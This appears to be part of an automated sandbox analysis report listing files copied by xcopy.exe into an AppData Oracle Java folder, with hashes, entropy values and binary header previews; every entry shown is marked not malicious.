                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                                                                                                                                              MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                                                                                                                                              SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                                                                                                                                              SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                                                                                                                                              SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20280
                                                                                                                                                                                              Entropy (8bit):7.085387497246545
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                                                                                                                                              MD5:AEC2268601470050E62CB8066DD41A59
                                                                                                                                                                                              SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                                                                                                                                              SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                                                                                                                                              SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19256
                                                                                                                                                                                              Entropy (8bit):7.060393359865728
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                                                                                                                                              MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                                                                                                                                              SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                                                                                                                                              SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                                                                                                                                              SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.13172731865352
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                                                                                                                                              MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                                                                                                                                              SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                                                                                                                                              SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                                                                                                                                              SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):28984
                                                                                                                                                                                              Entropy (8bit):6.6686462438397
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                                                                                                                                              MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                                                                                                                                              SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                                                                                                                                              SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                                                                                                                                              SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):26424
                                                                                                                                                                                              Entropy (8bit):6.712286643697659
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                                                                                                                                              MD5:35FC66BD813D0F126883E695664E7B83
                                                                                                                                                                                              SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                                                                                                                                              SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                                                                                                                                              SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73016
                                                                                                                                                                                              Entropy (8bit):5.838702055399663
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                                                                                                                                              MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                                                                                                                                              SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                                                                                                                                              SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                                                                                                                                              SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19256
                                                                                                                                                                                              Entropy (8bit):7.076072254895036
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                                                                                                                                              MD5:8D02DD4C29BD490E672D271700511371
                                                                                                                                                                                              SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                                                                                                                                              SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                                                                                                                                              SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):22840
                                                                                                                                                                                              Entropy (8bit):6.942029615075195
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                                                                                                                                              MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                                                                                                                                              SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                                                                                                                                              SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                                                                                                                                              SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):24368
                                                                                                                                                                                              Entropy (8bit):6.873960147000383
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                                                                                                                                              MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                                                                                                                                              SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                                                                                                                                              SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                                                                                                                                              SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):23488
                                                                                                                                                                                              Entropy (8bit):6.840671293766487
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                                                                                                                                              MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                                                                                                                                              SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                                                                                                                                              SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                                                                                                                                              SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20792
                                                                                                                                                                                              Entropy (8bit):7.018061005886957
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                                                                                                                                              MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                                                                                                                                              SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                                                                                                                                              SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                                                                                                                                              SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.127951145819804
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                                                                                                                                              MD5:B52A0CA52C9C207874639B62B6082242
                                                                                                                                                                                              SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                                                                                                                                              SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                                                                                                                                              SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1188216
                                                                                                                                                                                              Entropy (8bit):6.621625944667242
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:FeBPoBpMrGXL94IuO6YhJZi+Z+BuKo5cKb3W8:kqEuKcVDW8
                                                                                                                                                                                              MD5:47ADDDEB091D2B18A28EDC94CCC69A4C
                                                                                                                                                                                              SHA1:325824889894CDA1884B080D2E95787FA595A95B
                                                                                                                                                                                              SHA-256:5D5C6E03AFA8DFF9CE79DCD968449D87A2DFD0EEABFCF393F182CFE29D00C3C1
                                                                                                                                                                                              SHA-512:91697400AD2634BB0A0F8A68717944DE76FAD0A3C882608A54550923A438EC6D7D2FEF3C9897A4486DD2165BA5A229E6698D4ADE030C7C0A682F78517F0F5D16
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.Q...?G..?G..?G..G..?G...G..?G...G..?Gz..G..?G..G..?G..G..?G..>G/.?G...Gs.?G...Gw.?G...G..?G...G..?G...G..?GRich..?G........................PE..L.....\...........!.................U.......................................p......V.....@.......................................... ...N..............x....p.....................................x...@...............4...di..`....................text............................... ..`.rdata..............................@..@.data...x....`...~...D..............@....rsrc....N... ...P..................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):16248
                                                                                                                                                                                              Entropy (8bit):6.404770517933745
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:hlosghOyGOOV/snPV5VGfuj+ep5JNNzFwhhiZ:hldghZW0ndvGfuj+ev3whK
                                                                                                                                                                                              MD5:51268021CC53E09ECB014DD7A72C0FBC
                                                                                                                                                                                              SHA1:6198413F05674EFE7BC3941C0C9977361EFC1964
                                                                                                                                                                                              SHA-256:71AD5441D8107CA7780115CC42017C8292A4AD36B889D4576612C747D2D8A0D1
                                                                                                                                                                                              SHA-512:BFD94F6DD499CBB7FFD547E2AA1A46EE8C23BDEEC32F72E28D169A7C21E2B991CCDCF795ABFEAA5F4DB01EA397E1B1802E546FA458538B1CAF3F5027C5ED2773
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../x.W...w.W..W..W....s.W...u.W...@.W...A.W...p.W...q.W...v.W..Rich.W..........................PE..L.....\...........!......................... ...............................`............@..........................'......|$..<....@...............$..x....P....... ..............................8#..@............ ...............................text............................... ..`.rdata..v.... ......................@..@.data...p....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\client\Xusage.txt
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1423
                                                                                                                                                                                              Entropy (8bit):4.176285626070561
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:N3ZYKm8fuW6psByGJjR0X46kA2SsGFhD+GbpGCOhLRr3n:mOLUskGJjyltsGFV+GbpGCOTr
                                                                                                                                                                                              MD5:B3174769A9E9E654812315468AE9C5FA
                                                                                                                                                                                              SHA1:238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
                                                                                                                                                                                              SHA-256:37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
                                                                                                                                                                                              SHA-512:0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: -Xmixed mixed mode execution (default). -Xint interpreted mode execution only. -Xbootclasspath:<directories and zip/jar files separated by ;>. set search path for bootstrap classes and resources. -Xbootclasspath/a:<directories and zip/jar files separated by ;>. append to end of bootstrap class path. -Xbootclasspath/p:<directories and zip/jar files separated by ;>. prepend in front of bootstrap class path. -Xnoclassgc disable class garbage collection. -Xincgc enable incremental garbage collection. -Xloggc:<file> log GC status to a file with time stamps. -Xbatch disable background compilation. -Xms<size> set initial Java heap size. -Xmx<size> set maximum Java heap size. -Xss<size> set java thread stack size. -Xprof output cpu profiling data. -Xfuture enable strictest checks, anticipating futur
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\client\classes.jsa
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):12976128
                                                                                                                                                                                              Entropy (8bit):5.075892707796089
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:C6lJZugkDzRPim7x/4VfGPjm92jR8MMQDlISsiiuhFVbD5NxLaJ3GJ2l8+KahaTG:C6lnTiLBbDxV+KIeMtO/RUuhKL3VhT
                                                                                                                                                                                              MD5:176B18D92F004C50C85619E97AC6CE06
                                                                                                                                                                                              SHA1:721419A2D7FB1D79A0BFC29415229FE84394FEC6
                                                                                                                                                                                              SHA-256:1E336709F6793AE3E06B36624E82C86B5F931B262CA819CF4948843F6DAA1441
                                                                                                                                                                                              SHA-512:33E458B45DA40962293C5484C10430692FEF81F1BBAEB3F8CCE26775F89F90997C6DBC1BD7569A4DDCED528529DC2AB437F4B6C92A1695C01165B440D2C2812A
                                                                                                                                                                                              Malicious:false
